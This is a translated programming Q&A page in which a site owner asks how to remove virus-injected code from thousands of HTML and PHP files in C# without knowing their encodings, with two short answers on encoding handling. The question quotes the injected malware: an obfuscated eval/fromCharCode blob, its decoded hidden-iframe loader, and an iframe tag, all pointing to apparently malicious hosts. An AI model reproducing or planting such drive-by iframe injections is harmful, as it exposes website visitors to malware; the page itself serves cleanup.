Is it possible to read and write a file with minor changes without knowing its encoding in C #?

I need to download over 5000 files from FTP, which are .html and .php files. I need to read every file and delete some things that were put there by the virus, and save it back to FTP.

I am using the following code:

string content; using (StreamReader sr = new StreamReader(fileName, System.Text.Encoding.UTF8, true)) { content = sr.ReadToEnd(); sr.Close(); } using (StreamWriter sw = new StreamWriter(fileName + "1" + file.Extension, false, System.Text.Encoding.UTF8)) { sw.WriteLine(content); sw.Close(); } 

I downloaded several files manually, and some of them have <meta http-equiv="Content-Type" content="text/html; charset=windows-1250" /> , but I would not want them all to be like that. I checked with Notepad ++, and some ANSI text files. PHP seems to be UTF-8 and HTML Windows-1250, but I would prefer not to break files trying to fix it. So is there a way that I did not need to know / guess the encoding, and that would allow me to remove virus links from web pages?

Change I am trying to find and remove something like this:

var s = new String (); try {} document.rvwrew.vewr catch (d) {g = 1; c = string;} if (r && document.createTextNode) and = 2; e = Eval; t = [4.5 * U, 18 / i, 52.5 * i, 204 / i, 16 * and 80 / i, 50 * i, 222 / i, 49.5 * i, 234 / i, 54.5 * i, 202 / and, 55 * u, 232 / u, 23 * u, 206 / u, 50.5 * u, 232 / u, 34.5 * u, 216 / u, 50.5 * u, 218 / u, 50.5 * u, 220 / u, 58 * u, 230 / u, 33 * i, 242 / i, 42 * i, 194 / i, 51.5 * i, 156 / i, 48.5 * i, 218 / i, 50.5 * i, 80 / i, 19.5 * and, 196 / i, 55.5 * i, 200 / i, 60.5 * i, 78 / i, 20.5 * i, 182 / i, 24 * i, 186 / i, 20.5 * i, 246 / y, 4.5 * U, 18 / i, 4,5 * U, 210 / y, 51 * i, 228 / i, 48.5 * i, 218 / i, 50.5 * i, 228 / i, 20 * and 82 / i, 29.5 * and , 18 / u, 4.5 * U, 250 / u, 16 * u, 202 / u, 54 * u, 230 / u, 50.5 * u, 64 / u, 61.5 * u, 18 / u, 4.5 * u , 18 / u, 50 * u, 222 / u, 49.5 * i, 234 / i, 54.5 * i, 202 / i, 55 * i, 232 / i, 23 * i, 238 / u, 57 * i, 210 / y, 58 * i, 202 / y, 20 * i, 68 / i, 30 * i, 210 / y, 51 * i, 228 / i, 48.5 * i, 218 / i, 50.5 * i, 64 / i , 57.5 * i, 228 / i, 49.5 * i, 122 / i, 19.5 * i, 208 / y, 58 * i, 232 / i, 56 * i, 116 / i, 23.5 * i, 94 / i, 51 * u, 210 / u, 49 * u, 202 / u, 57 * u, 194 / u, 57.5 * u, 232 / u, 48.5 * u, 232 / u, 23 * u, 198 / u, 55.5 * u , 218 / u, 23.5 * u, 232 / u, 50.5 * i, 218 / i, 56 * and 94 / i, 57.5 * i, 232 / i, 48.5 * i, 232 / i, 23 * i, 224 / u, 52 * i, 224 / i, 19.5 * i, 64 / i, 59.5 * i, 210 / i, 50 * i, 232 / i, 52 * i, 122 / i, 19.5 * i, 98 / i, 24 * and 78 / i, 16 * I, 208 / i, 50.5 * i, 210 / i, 51.5 * i, 208 / y, 58 * i, 122 / i, 19.5 * i, 98 / i, 24 * and 78 / i , 16 * U, 230 / y, 58 * i, 242 / i, 54 * i, 202 / i, 30.5 * i, 78 / i, 59 * i, 210 / i, 57.5 * i, 210 / y, 49 * i, 210 / i, 54 * i, 210 / y, 58 * i, 242 / i, 29 * i, 208 / y, 52.5 * i, 200 / i, 50 * i, 202 / i, 55 * i, 118 / i, 56 * i, 222 / i, 57.5 * i, 210 / y, 58 * i, 210 / i, 55.5 * i, 220 / y, 29 * i, 194 / y, 49 * and , 230 / i, 55.5 * i, 216 / i, 58.5 * i, 232 / i, 50.5 * i, 118 / i, 54 * i, 202 / i, 51 * i, 232 / i, 29 * and 96 / i, 29.5 * i, 232 / i, 55.5 * i, 224 / y, 29 * and 96 / i, 29.5 * i, 78 / i, 31 * i, 120 / i, 23.5 * i, 210 / y, 51 * i, 228 / i, 48.5 * i, 218 / i, 50.5 * i, 124 / i, 17 * and 82 / i, 29.5 * i, 18 / i, 4.5 * U, 250 / u, 4, 5 * U, 18 / i, 51 * and, 234 / y, 55 * i, 198 / y, 58 * i, 210 / i, 55.5 * i, 220 / y, 16 * i, 210 / y, 51 * i, 228 / i, 48.5 * i, 218 / i, 50.5 * i, 228 / i, 20 * and 82 / i, 61.5 * i, 18 / i, 4.5 * i, 18 / i, 59 * i, 194 / y, 57 * and 64 / i, 51 * and 64 / i, 30.5 * i, 64 / i, 50 * i, 222 / i, 49.5 * U, 234 / i, 54.5 * i, 202 / i, 55 * i, 232 / i, 23 * i, 198 / y, 57 * i, 202 / i, 48.5 * i, 232 / i, 50.5 * i, 138 / i, 54 * i, 202 / i, 54.5 * i, 202 / i, 55 * and , 232 / i, 20 * and 78 / i, 52.5 * i, 204 / y, 57 * i, 194 / i, 54.5 * i, 202 / i, 19.5 * i, 82 / i, 29.5 * i, 204 / y, 23 * i, 230 / i, 50.5 * i, 232 / i, 32.5 * i, 232 / i, 58 * i, 228 / i, 52.5 * i, 196 / i, 58.5 * i, 232 / i, 50.5 * i, 80 / i, 19.5 * i, 230 / y, 57 * i, 198 / i, 19.5 * i, 88 / i, 19.5 * i, 208 / y, 58 * i, 232 / i, 56 * and, 116 / i, 23.5 * i, 94 / i, 51 * i, 210 / y, 49 * i, 202 / i, 57 * i, 194 / i, 57.5 * i, 232 / i, 48.5 * i, 232 / i, 2 3 * i, 198 / i, 55.5 * i, 218 / i, 23.5 * i, 232 / i, 50.5 * i, 218 / i, 56 * and 94 / i, 57.5 * i, 2 32 / i, 48.5 * i, 232 / i, 23 * i, 224 / y, 52 * i, 224 / i, 19.5 * i, 82 / i, 29.5 * i, 204 / i, 23 * i, 230 / y, 58 * i, 242 / i, 54 * i, 202 / y, 23 * i, 236 / i, 52.5 * i, 230 / i, 52.5 * i, 196 / i, 52.5 * i, 216 / i, 52.5 * i, 232 / i, 60.5 * i, 122 / i, 19.5 * i, 208 / y, 52.5 * y, 200 / y, 50 * i, 202 / i, 55 * i, 78 / i, 29.5 * i, 204 / y, 23 * i, 230 / y, 58 * i, 242 / i, 54 * i, 202 / y, 23 * i, 224 / i, 55.5 * i, 230 / i, 52.5 * and, 232 / i, 52.5 * i, 222 / i, 55 * i, 122 / i, 19.5 * i, 194 / y, 49 * i, 230 / i, 55.5 * i, 216 / i, 58.5 * U, 232 / i, 50.5 * i, 78 / i, 29.5 * i, 204 / y, 23 * i, 230 / y, 58 * i, 242 / i, 54 * i, 202 / y, 23 * i, 216 / i, 50.5 * i, 204 / y, 58 * i, 122 / i, 19.5 * i, 96 / i, 19.5 * y, 118 / y, 51 * and 92 / i, 57.5 * i, 232 / U , 60.5 * i, 216 / i, 50.5 * i, 92 / i, 58 * i, 222 / i, 56 * i, 122 / i, 19.5 * i, 96 / i, 19.5 * i, 118 / i , 51 * and 92 / i, 57.5 * i, 202 / y, 58 * i, 130 / i, 58 * i, 232 / i, 57 * i, 210 / y, 49 * i, 234 / i, 58 * and, 202 / , 20 * and 78 / i, 59.5 * i, 210 / i, 50 * i, 232 / i, 52 * and 78 / i, 22 * ​​and 78 / i, 24.5 * i, 96 / i, 19.5 * and, 82 / i, 29.5 * i, 204 / y, 23 * i, 230 / i, 50.5 * i, 232 / i, 32.5 * i, 232 / i, 58 * i, 228 / i, 52.5 * i, 196 / i, 58.5 * i, 232 / i, 50.5 * i, 80 / i, 19.5 * i, 208 / i, 50.5 * i, 210 / i, 51.5 * i, 208 / i, 58 * and 78 / i , 22 * ​​and 78 / i, 24.5 * i, 96 / i, 19.5 * i, 82 / i, 29.5 * i, 18 / i, 4.5 * i, 18 / i, 50 * i, 222 / i, 49.5 * i, 234 / i, 54.5 * i, 202 / i, 55 * i, 232 / i, 23 * i, 206 / i, 50.5 * i, 232 / i, 34.5 * i, 216 / i, 50.5 * and, 218 / i, 50.5 * i, 220 / y, 58 * I, 230 / y, 33 * i, 242 / i, 42 * i, 194 / i, 51.5 * i, 156 / i, 48.5 * i, 218 / i, 50.5 * i, 80 / i, 19.5 * U, 196 / i, 55.5 * i, 200 / i, 60.5 * i, 78 / i, 20.5 * i, 182 / i, 24 * i, 186 / y, 23 * u, 194 / u, 56 * u, 224 / u, 50.5 * u, 220 / u, 50 * u, 134 / u, 52 * u, 210 / u, 54 * u, 200 / u, 20 * u, 204 / u, 20.5 * u, 118 / u 4,5 * U, 18 / u, 62.5 * u]; if (document.createTextNode) with (s) mm = fromCharCode; for (I = 0 ;! i = m.length; i ++) S + = mm (e ("m" + "[" + "i" + ']')); try {doc.qwe.removeChild ()} catch (d) {e (s);}

which after decoding

 if (document.getElementsByTagName('body')[0]) { iframer(); } else { document.write(""); } function iframer() { var f = document.createElement('iframe'); f.setAttribute('src', 'http://fiberastat.com/temp/stat.php'); f.style.visibility = 'hidden'; f.style.position = 'absolute'; f.style.left = '0'; f.style.top = '0'; f.setAttribute('width', '10'); f.setAttribute('height', '10'); document.getElementsByTagName('body')[0].appendChild(f); } 

And when you visit a web page, it says it (after decoding).

 if (document.getElementsByTagName('body')[0]) { iframer(); } else { document.write(""); } function iframer() { var f = document.createElement('iframe'); f.setAttribute('src', 'http://vtempe.in/in.cgi?17'); f.style.visibility = 'hidden'; f.style.position = 'absolute'; f.style.left = '0'; f.style.top = '0'; f.setAttribute('width', '10'); f.setAttribute('height', '10'); document.getElementsByTagName('body')[0].appendChild(f); } 

the script is added with the last 3 lines and starts right after </html> var

The PHP script has more or less this line type <iframe src="http://hugetopdiet.cn:8080/ts/in.cgi?pepsi13" width=2 height=4 style="visibility: hidden"></iframe> but it can be anywhere in the file.

Not sure if there is another way to rewrite these files. But you have to go through 5000 files, it seems too much and risky :-)

+6
source share
2 answers

Assuming none of the files are UTF16 or UTF32, and the parts you want to interact with are fully 7-bit ASCII, you can open and save it as Encoding.Default , which will round up any higher character correctly.

+3
source

The virus did not need to know the encoding of the file in order to add its contents to your files, so that it was obvious. Instead of treating the file as text, could you just treat it as a binary and look for patterns that match what the virus added?

+1
source

Source: https://habr.com/ru/post/908093/


All Articles